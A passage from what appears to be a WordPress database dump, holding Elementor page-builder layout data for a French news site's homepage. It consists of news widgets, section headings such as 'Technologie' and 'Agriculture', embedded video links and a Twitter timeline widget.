"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2354,758,'_elementor_version','0.4'),(2355,758,'_elementor_css','a:3:{s:4:\"time\";i:1509370468;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2357,759,'_elementor_edit_mode','builder'),(2358,759,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"350\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements